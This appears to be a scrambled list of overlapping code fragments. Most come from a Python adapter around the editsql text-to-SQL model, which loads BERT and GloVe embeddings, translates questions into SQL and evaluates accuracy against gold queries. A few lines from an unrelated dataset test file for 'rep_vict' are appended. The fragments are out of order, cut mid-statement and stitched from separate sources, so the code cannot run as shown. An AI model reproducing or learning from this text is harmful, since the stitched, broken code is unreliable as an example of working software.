"output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings", "an interaction in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] =", "time_per_item = duration / amount num_correct = amount - num_errors accuracy = num_correct", "True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint", "c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else", "= references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction", "/ \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\"", "vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert", "vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load", "comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing", "database that acts as context prev_predictions: the previous predictions Returns: an InteractionItem that", "\"\"\" # load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile:", "1 print('Glove OOV:', glove_oov, 'Para OOV', 
para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings =", "modified version with absolute path instead of relative path in the first line", "= self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function", "----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with", "from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to", "self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol", "to an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def", "editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from", "the previous predictions Returns: an InteractionItem that contains the natural language question and", "results of standalone editsql act as the reference. 
The use_gold_query switch enables comparison", "print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file,", "use randomness: randomly choose samples show_all: write all samples, not only those with", "= translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors", "do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH,", "'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary)", "\"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform", "= ''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\"", "else c.lower() for c in translation) if use_gold_query: is_error = translation_norm != gold_norm", "example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw", "dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in", "question into sql Args: nl_question: the natural language question db_id: the database that", "is_error: num_errors += 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] =", "# ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size =", "single natural language question into sql Args: nl_question: the natural language question db_id:", "id \"\"\" # establish the structure of an interaction in raw state example", 
"spider Args: amount: the amount of samples to use randomness: randomly choose samples", "vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings", "import time from pathlib import Path import numpy as np import json import", "editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from", "= {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type =", "the next utterance in an interaction Args: nl_question: the natural language question db_id:", "else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return", "structure of an interaction in raw state example = dict() example[\"final\"] = dict()", "translate(self, nl_question, db_id): \"\"\" Translate a single natural language question into sql Args:", "with errors use_gold_query: comparison with the gold queries from spider instead of the", "from the input file and save the translations to a file in the", "in the output directory Args: input_file: path of file with list of dicts", "data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary,", "model Args: params: the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel", "import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from", "the database that acts as context prev_nl_questions: the previous questions or an empty", "= time_per_item eval_output[\"# items\"] = amount 
eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"]", "gold queries from spider instead of the prediction results of standalone editsql \"\"\"", "fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] =", "schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction in raw state", "of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 #", "None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite", "column_names={}, database_schemas_dict={}) # function used for loading of interaction in raw state self.int_load_function", "None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return model def", "language questions db_id: the database that acts as context prev_predictions: the previous predictions", "= time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq", "= ''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if use_gold_query: is_error", "input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for nl_question and", "in an interaction Args: nl_question: the natural language question db_id: the database that", "def load_model(self, params, data): \"\"\" Loads the editsql translation model Args: params: the", "db_id): \"\"\" Translate a single natural language question into sql Args: nl_question: the", "= os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') 
init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file)", "example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw interaction to an", "gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time()", "para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in", "pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens) return", "comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else:", "the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model =", "randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. By default the", "editsql translation model Args: params: the parsed arguments data: the ATISDataset Returns: the", "raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill", "Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of", "'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb", "as context prev_nl_questions: the previous questions or an empty list prev_predictions: the previous", "determine the instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else:", "if c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit()", "def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, 
schema) return post_processed", "of samples to use randomness: randomly choose samples show_all: write all samples, not", "Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions,", "By default the prediction results of standalone editsql act as the reference. The", "show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] =", "empty list prev_predictions: the previous predictions or an empty list Returns: the sql", "the prediction results of standalone editsql act as the reference. The use_gold_query switch", "not only those with errors use_gold_query: comparison with the gold queries from spider", "for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c", "for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c", "requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests,", "data): \"\"\" Loads the editsql translation model Args: params: the parsed arguments data:", "act as the reference. The use_gold_query switch enables comparison with the gold queries", "dataset and model data = ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas", "from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel", "input_file: path of file with list of dicts with values for nl_question and", "use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. 
By default the prediction results", "the natural language question and the database id \"\"\" # establish the structure", "comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison)", "start time_per_item = duration / amount num_correct = amount - num_errors accuracy =", "model from file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id,", "obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id):", "prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000)", "open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a modified", "editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model", "torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function", "of relative path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR /", "\"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function with the", "read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from", "= pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str", "- num_errors accuracy = num_correct * 100 / amount eval_output = dict() eval_output[\"time", "items\"] = amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else:", "request[\"db_id\"]) 
write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") +", "the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in", "natural language question and the database id \"\"\" # establish the structure of", "params): glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings", "= load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql", "sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the", "= None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size #", "BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass", "file and save the translations to a file in the output directory Args:", "BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\"", "import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of", "functionality of editsql to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"):", "loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize", 
"translation output of EditsqlAdapter. By default the prediction results of standalone editsql act", "interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single", "print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert,", "is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold", "that contains the natural language question and the database id \"\"\" # establish", "0 para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token", "np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for", "post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0,", "if not amount: # let amount default to _all_ examples from the file", "params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case =", "Loads the editsql translation model Args: params: the parsed arguments data: the ATISDataset", "prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance in an interaction", "schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation -----------------", "_, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of", "\"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions)", "self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and", 
"the translations to a file in the output directory Args: input_file: path of", "numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for", "accuracy = num_correct * 100 / amount eval_output = dict() eval_output[\"time per item\"]", "version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute path instead", "'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if", "nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction,", "from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert", "input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens", "prev_predictions: the previous predictions Returns: an InteractionItem that contains the natural language question", "from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as", "nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw interaction to", "path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb", "'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining", "Args: amount: the amount of samples to use randomness: randomly choose samples show_all:", "interaction to an InteractionItem obj, _ = 
self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction", "!= gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1", "comparisons = [] num_errors = 0 start = time.time() for i in sample_indices:", "= 0 start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw", "query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\":", "db_id from the input file and save the translations to a file in", "write all samples, not only those with errors use_gold_query: comparison with the gold", "c.lower() for c in translation) if use_gold_query: is_error = translation_norm != gold_norm else:", "os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer =", "import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import", "default to _all_ examples from the file amount = len(references) # determine the", "embeddings loading function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary,", "or an empty list Returns: the sql prediction \"\"\" # preprocess nl_questions =", "import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import", "= self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def", "''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if", "function used for loading of interaction in 
raw state self.int_load_function = load_function(params, data.entities_dictionary,", "equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output,", "to be predicted\" # transform the raw interaction to an InteractionItem obj, _", "let amount default to _all_ examples from the file amount = len(references) #", "self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id,", "only those with errors use_gold_query: comparison with the gold queries from spider instead", "\"\"\" Translate a single natural language question into sql Args: nl_question: the natural", "editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import *", "!= dev_pred_norm if is_error: num_errors += 1 if is_error or show_all: comparison =", "= False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH,", "return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains", "translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm !=", "Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile:", "and save the translations to a file in the output directory Args: input_file:", "next utterance in an interaction Args: nl_question: the natural language question db_id: the", "load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references =", "dev_prediction = postprocess_one(dev_prediction, schema) translation = 
self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold", "if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" +", "postprocess_one(gold, schema) # normalize and prevent numbering from distorting the results gold_norm =", "# establish the structure of an interaction in raw state example = dict()", "in translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm", "nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language question", "def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next", "glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov =", "= comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def", "in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else:", "if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the", "references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query:", "Evaluate the translation output of EditsqlAdapter. 
By default the prediction results of standalone", "gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1 if", "to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount)", "open(input_file) as f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] =", "with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with", "= translation comparisons.append(comparison) end = time.time() duration = end - start time_per_item =", "\".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction,", "input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with the", "comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls,", "= ''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\"", "comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold", "glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings =", "id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"]", "comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] =", "parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and model data =", "the editsql 
translation model Args: params: the parsed arguments data: the ATISDataset Returns:", "atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural language", "return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema)", "prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the", "contains the natural language question and the database id Args: nl_questions: the natural", "list prev_predictions: the previous predictions or an empty list Returns: the sql prediction", "EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary questions into sql", "standalone editsql act as the reference. The use_gold_query switch enables comparison with the", "show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. 
By default the prediction", "else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")", "nl_question: the natural language question db_id: the database that acts as context prev_nl_questions:", "nl_question and db_id output_dir: path of dir where the translations are saved \"\"\"", "question and the database id Args: nl_questions: the natural language questions db_id: the", "of an interaction in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"]", "len(references) # determine the instances to test on if randomness: sample_indices = random.sample(range(len(references)),", "comparisons.append(comparison) end = time.time() duration = end - start time_per_item = duration /", "post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed #", "for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content,", "from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql", "\" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \"", "path of dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with", "= \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold =", "loading function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema,", "import * from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\"", 
"= self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate", "show_all: write all samples, not only those with errors use_gold_query: comparison with the", "adapters.editsql.constants import * from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter:", "+ params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an" ]
[ "shutil import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module", "downloading rep_vict.csv and testing shape of extracted data has 8 rows and 8", "import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape", "import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading", "by downloading rep_vict.csv and testing shape of extracted data has 8 rows and", "8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape", "division from __future__ import print_function import shutil import sys import tempfile from observations.r.rep_vict", "8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path)", "import absolute_import from __future__ import division from __future__ import print_function import shutil import", "rep_vict.csv and testing shape of extracted data has 8 rows and 8 columns", "print_function import shutil import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict():", "def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of extracted", "tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8) except: shutil.rmtree(test_path)", "rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of", "and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert", "test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8)", "import print_function import shutil import sys import tempfile from observations.r.rep_vict import rep_vict def", "testing shape of extracted data has 8 rows and 8 columns \"\"\" test_path", "tempfile from observations.r.rep_vict 
import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv", "and testing shape of extracted data has 8 rows and 8 columns \"\"\"", "absolute_import from __future__ import division from __future__ import print_function import shutil import sys", "shape of extracted data has 8 rows and 8 columns \"\"\" test_path =", "= tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8) except:", "has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata =", "<filename>tests/r/test_rep_vict.py from __future__ import absolute_import from __future__ import division from __future__ import print_function", "from __future__ import absolute_import from __future__ import division from __future__ import print_function import", "__future__ import division from __future__ import print_function import shutil import sys import tempfile", "\"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of extracted data has", "__future__ import print_function import shutil import sys import tempfile from observations.r.rep_vict import rep_vict", "rep_vict.py by downloading rep_vict.csv and testing shape of extracted data has 8 rows", "rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try:", "__future__ import absolute_import from __future__ import division from __future__ import print_function import shutil", "test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of extracted data", "from __future__ import division from __future__ import print_function import shutil import sys import", "import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py", "from __future__ import print_function import shutil import sys import tempfile from observations.r.rep_vict import", "import shutil import sys import tempfile from observations.r.rep_vict 
